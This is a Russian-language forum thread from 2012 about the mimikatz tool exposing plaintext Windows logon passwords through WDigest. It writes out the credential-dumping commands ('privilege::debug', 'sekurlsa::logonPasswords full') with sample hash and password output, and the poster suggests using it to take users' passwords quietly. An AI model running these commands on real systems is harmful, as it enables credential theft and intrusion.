Имя пользователя:
Пароль:  
Помощь | Регистрация | Забыли пароль?  | Правила  

Компьютерный форум OSzone.net » Архив » Новости и события Microsoft » Обнаружена опасная уязвимость в Microsoft Windows

 
Настройки темы
Обнаружена опасная уязвимость в Microsoft Windows
exo exo вне форума

Аватара для exo

Ветеран


Сообщения: 12417
Благодарности: 1442


Конфигурация

Профиль | Отправить PM | Цитировать


Изменения
Автор: exo
Дата: 01-08-2012
Локальный пользователь может получить доступ к потенциально важным данным. Возможно данная угроза исключена при использовании HIPS
Исследователь Benjamin "gentilkiwi" ("хороший киви") недавно опубликовал в своем блоге новую версию утилиты mimikatz 1.0, предназначенной для работы с учетными данными на ОС Windows. В новой версии, помимо функционала, аналогичного Windows Credentials Editor, был реализован функционал получения пароля пользователя в открытом виде.
Брешь, используемая mimikatz, связана с реализацией WDigest.dll, предназначенной для дайджест-аутентификации. Особенности реализации механизма HTTP Digest Authentication для поддержки SSO (Single Sign On) требуют знание вводимого пароля, а не только его хеша. Поэтому, разработчики Windows решили хранить пароли пользователей в открытом виде.
Чтобы просмотреть список паролей авторизованных пользователей на системе необходимо выполнить следующие команды:

privilege::debug
sekurlsa::logonPasswords full

Вывод будет примерно следующим:
Цитата:
Authentification Id : 0;210550
Package d'authentification : Kerberos
Utilisateur principal : user
Domaine d'authentification : domain
msv1_0 :
* Utilisateur : user
* Domaine : domain
* Hash LM : 25d934a376b906731d71060d896b7a46
* Hash NTLM : 13b98a9edbce8ef280527c9dd2725ea0
kerberos :
* Utilisateur : user
* Domaine : domain
* Mot de passe : password
wdigest :
* Utilisateur : user
* Domaine : domain
* Mot de passe : password
tspkg :
* Utilisateur : user
* Domaine : domain
* Mot de passe : password
новость взял отсюда
скачать утилиту можно отсюда

лично проверил (вин 7, 2008 R2) - работает только под администратором. В предыдущей версии утилиты антивирусы с HISP могли блокировать доступ. С неё помощью можно мигрировать пароли пользователей, если нужна очень "тихая" миграция.

-------
Вежливый клиент всегда прав!


Отправлено: 18:50, 21-02-2012

 
exo exo вне форума Автор темы

Аватара для exo

Ветеран


Сообщения: 12417
Благодарности: 1442

Профиль | Отправить PM | Цитировать


Цитата winbond:
на машине без антивируса, под локальным админом и без перезагрузки. Как-то уже не впечатляет »
поверьте, такие пользователи есть, иначе бы писать на форум было бы некому....

-------
Вежливый клиент всегда прав!


Отправлено: 22:25, 27-07-2012 | #21



Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети.

Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля.


Аватара для Delirium

Ветеран


Сообщения: 5624
Благодарности: 936

Профиль | Отправить PM | Цитировать


Я чего то не понял, у нас англоязычный форум уже?
gentilkiwi, exo, предупреждение по ОПК 2.3.
gentilkiwi, official language at this forum - Russian.

-------

Пройденные курсы:
[Microsoft №10174 Sharepoint], [SharePoint]
Мои проекты:[CheckAdmins], [NetSend7], [System Uptime], [Remote RAdmin LogViewer],[Netdom GDI], [Holidays - напоминалка о днях рождения]

А я офис-гуру :)


Отправлено: 01:20, 30-07-2012 | #22



Компьютерный форум OSzone.net » Архив » Новости и события Microsoft » Обнаружена опасная уязвимость в Microsoft Windows

Участник сейчас на форуме Участник сейчас на форуме Участник вне форума Участник вне форума Автор темы Автор темы Шапка темы Сообщение прикреплено

Похожие темы
Название темы Автор Информация о форуме Ответов Последнее сообщение
Вопрос - [решено] сайты с якобы "обнаружена уязвимость" exo Защита компьютерных систем 6 08-03-2011 22:50
Обнаружена новая критическая уязвимость в CSS-подсистеме браузера Internet Explorer OSZone News Новости и события Microsoft 0 14-12-2010 00:30
Microsoft решила не исправлять недавно найденную уязвимость в Windows XP OSZone News Новости и события Microsoft 11 20-09-2009 23:40
В безопасности IE8 снова обнаружена уязвимость OSZone News Новости и события Microsoft 4 23-03-2009 09:17
Microsoft Internet Explorer - обнаружена ошибка... Zluk Microsoft Windows 95/98/Me (архив) 6 31-03-2005 23:41




 
Переход